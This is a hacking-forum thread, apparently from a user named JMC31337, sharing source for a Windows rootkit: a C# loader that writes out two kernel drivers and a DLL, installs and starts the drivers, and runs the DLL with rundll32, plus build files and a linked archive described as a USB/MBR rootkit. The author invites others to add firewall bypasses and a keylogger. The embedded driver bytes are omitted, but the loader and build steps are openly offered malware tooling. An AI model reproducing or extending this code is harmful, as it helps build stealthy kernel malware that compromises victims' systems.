		    int ret = 0;		    Console.WriteLine("Unloading now...");
		    if (fileHandle != IntPtr.Zero && fileHandle != INVALID_HANDLE_VALUE)
		    {
			    CloseHandle(fileHandle);
		    }
		    if ((ret = ExecuteSCMOperationOnDriver(driverName, "StopService")) == 0)
		    {
			    ret = ExecuteSCMOperationOnDriver(driverName, "Delete");
		    }
		    if (ret != 0)
		    {
			    return false;
		    }
		    return true;
	    }	    private static int ExecuteSCMOperationOnDriver(string driverName, string operation)
	    {
		    ManagementPath path = new ManagementPath();
		    path.Server = ".";
		    path.NamespacePath = @"root\CIMV2";
		    path.RelativePath = @"Win32_BaseService.Name='" + driverName + "'";
		    using (ManagementObject o = new ManagementObject(path))
		    {
			    ManagementBaseObject outParams = o.InvokeMethod(operation,null, null);
			    return Convert.ToInt32(outParams.Properties["ReturnValue"].Value);
		    }
	    }	    internal IntPtr OpenDevice()
	    {
		    Console.WriteLine(driverName);
		    fileHandle = CreateFile("\\\\.\\"+driverName, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);		    Console.WriteLine("CreateFile: "+fileHandle);
		    //Console.WriteLine(Marshal.GetLastWin32Error());
	    if(fileHandle == INVALID_HANDLE_VALUE)
	    {
		    Console.WriteLine("Throw exception");
		    Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n");
		    //Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
	    }
	    return fileHandle;
	    }
	    internal IntPtr DevControl()
	    {
		    Console.WriteLine("DevControl started");
		    //long DeviceBuffer = 0;
		    IntPtr dwState = new IntPtr(100);
		    uint dwRet=0;		    bool dc = DeviceIoControl(fileHandle, FSConstants.IO_SET_EVENT, IntPtr.Zero, 0, dwState, (uint)Marshal.SizeOf(dwRet), ref dwRet, IntPtr.Zero);		    Console.WriteLine("Operation: "+dc);
		    Console.WriteLine("Return Value: "+dwRet);
		    Console.WriteLine("Error: "+(Marshal.GetLastWin32Error()).ToString() + "\n\n\n");
		    if (fileHandle == INVALID_HANDLE_VALUE)
		    {
			    //Console.WriteLine("Throw exception");
			    //Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n");
			    //Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
		    }
		    return fileHandle;
	    }	    private static int HRESULT_FROM_WIN32(int x)
	    {
		    return x <= 0 ? x : ((x & 0x0000FFFF) | FACILITY_WIN32);
	    }
    }    internal class FSConstants
    {
	    private const int FILE_DEVICE_COMM_DRIVER = 0x00008810;
	    const uint METHOD_NEITHER = 3;
	    const uint METHOD_BUFFERED = 0;	    const uint FILE_ANY_ACCESS = 0;
	    const uint FILE_SPECIAL_ACCESS = FILE_ANY_ACCESS;
	    public static uint IO_SET_EVENT = CTL_CODE(FILE_DEVICE_COMM_DRIVER, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS);
	    static uint CTL_CODE(uint DeviceType, uint Function, uint Method, uint Access)
	    {
		    return ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method);
	    }
    }
class Program
{
private const uint GENERIC_READ = 0x80000000;
	    private const uint OPEN_EXISTING = 3;
public enum ThreadAccess : int
	    {
		    TERMINATE = (0x0001),
		    SUSPEND_RESUME = (0x0002),
		    GET_CONTEXT = (0x0008),
		    SET_CONTEXT = (0x0010),
		    SET_INFORMATION = (0x0020),
		    QUERY_INFORMATION = (0x0040),
		    SET_THREAD_TOKEN = (0x0080),
		    IMPERSONATE = (0x0100),
		    DIRECT_IMPERSONATION = (0x0200)
	    }
[DllImport("kernel32", SetLastError = true)]
	    internal static extern IntPtr CreateFile(string lpFileName, uint
	    dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint
	    dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
[DllImport("kernel32.dll")]
	    static extern int ResumeThread(IntPtr hThread);	    [DllImport("kernel32.dll")]
	    static extern int SuspendThread(IntPtr hThread);	    [DllImport("kernel32.dll")]
	    static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess,
		    bool bInheritHandle,
		    uint dwThreadId);static void Main(string[] args)
{
try{
BinaryWriter binWriter = new BinaryWriter(File.Open(@"\Driver.sys", FileMode.Create));
byte[] bb = new byte[] {!!!!FILE NOT INCLUDED!!!!!};
		   binWriter.Write(bb);
		   binWriter.Close();
}
catch(Exception e){}
//==============================
try{
BinaryWriter binWriter2 = new BinaryWriter(File.Open(@"\Hide_X.sys", FileMode.Create));
byte[] cc = new byte[] {!!!FILE NOT INCLUDED!!!};
		   binWriter2.Write(cc);
		   binWriter2.Close();
}
catch(Exception e){}
//=============================
try{
BinaryWriter binWriter3 = new BinaryWriter(File.Open(@"\DLLHell.dll", FileMode.Create));
byte[] dd = new byte[] {!!!FILE NOT INCLUDED!!!};
		   binWriter3.Write(dd);
		   binWriter3.Close();
}
catch(Exception e){}
//=============================
Thread.Sleep(1000);
bool check=true;string driverName = "Driver";
string driverName2 = "Hide_X";Win32Driver driver = new Win32Driver(driverName,"\\Driver.sys");
  if (driver.LoadDeviceDriver())
  {
			    Console.WriteLine(driverName + " loaded");
			    IntPtr handle = driver.OpenDevice();
			    Console.WriteLine(handle);
			    Console.WriteLine("Device opened");
			    // use device using ....DeviceIoControl(handle,....) see class code for signature
			    driver.DevControl();
  }
Win32Driver driver2 = new Win32Driver(driverName2,"\\Hide_X.sys");
  if (driver2.LoadDeviceDriver())
  {
			    Console.WriteLine(driverName2 + " loaded");
			    IntPtr handle = driver2.OpenDevice();
			    Console.WriteLine(handle);
			    Console.WriteLine("Device opened");
			    // use device using ....DeviceIoControl(handle,....) see class code for signature
			    driver2.DevControl();
  }
Process myProcess = new Process();
ProcessStartInfo myProcessStartInfo =
new ProcessStartInfo("rundll32.exe" );
myProcessStartInfo.UseShellExecute = false;
myProcessStartInfo.RedirectStandardOutput = true;
myProcessStartInfo.Arguments= "\\DLLHell.dll MsgBox";
myProcess.StartInfo = myProcessStartInfo;
myProcess.Start();}
}
  • Author

You guys figure out the kernel firewall bypass tricks and networking stuff and it'll be a kickin rootkit

  • Author

heres the dllhell.h code snippets

#ifdef __MAIN_H__

#define __MAIN_H__

#include <windows.h>

#define DLL_EXPORT__declspec(dllexport)

#ifdef cplusplus extern "C"

{

#endif

int DLL_EXPORT MsgBox(int x);

#ifdef __cplusplus

}

#endif

#endif //__MAIN_H__

Edited by JMC31337

  • Author

Shoulda stored all the code in hex format included in the sys file itself.. you guys/gals can do better than the one i wrote.. needs a keylogger too...

wink.png

Edited by JMC31337

  • Author

Here's the MAKEFILE and SOURCES to compile with the sdk/ddk

MAKEFILE:

=======

!INCLUDE $(NTMAKEENV)\Makefile.def

=======

SOURCES:

=======

TARGETNAME = Hide_X

TARGETPATH = obj

TARGETTYPE = DRIVER

_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)

INCLUDES = %BUILD%\inc

LIBS = %BUILD%\lib

SOURCES = hidez.c

===============

MAKEFILE:

======

!INCLUDE $(NTMAKEENV)\Makefile.def

======

SOURCES:

=====

TARGETNAME = Driver

TARGETPATH = obj

TARGETTYPE = DRIVER

_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)

INCLUDES = %BUILD%\inc

LIBS = %BUILD%\lib

SOURCES = driver.c

Edited by JMC31337

  • 6 months later...
  • Author

decided its been long enough.. heres the entire archive...

The moderator can remove it if its a problem

RootKit_USBMBR.rar

and the original 11-11 (got the idea on the 11th after a Solara's Gateway 1111 group)

Solara1111.rar

Edited by JMC31337

Thanks and good project to study it

thx for project.. nice code.. ;)

  • 4 weeks later...
  • Author

Thnx but it could be better...

1 sys file instead of 2 would have been better but I couldn't fig out the hide process and other f(x)'s to work all within one file with the timer f(x)

Have the ioctl problem in Linux when I do drivers with timers

What else, re-mounting the disks with 16 bit???

Talk about being taken back to the beginnin of time

The for loop to avoid the USB format tool error window(sometimes):

should fig'd out how to write those MBR myself

Screensaver payload activation came from my buddy SKB....

C# sys loader using C code dll ... Next time I need to pick 1 language and stick with it

ehhh ehhh

Edited by JMC31337

Create an account or sign in to comment

Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.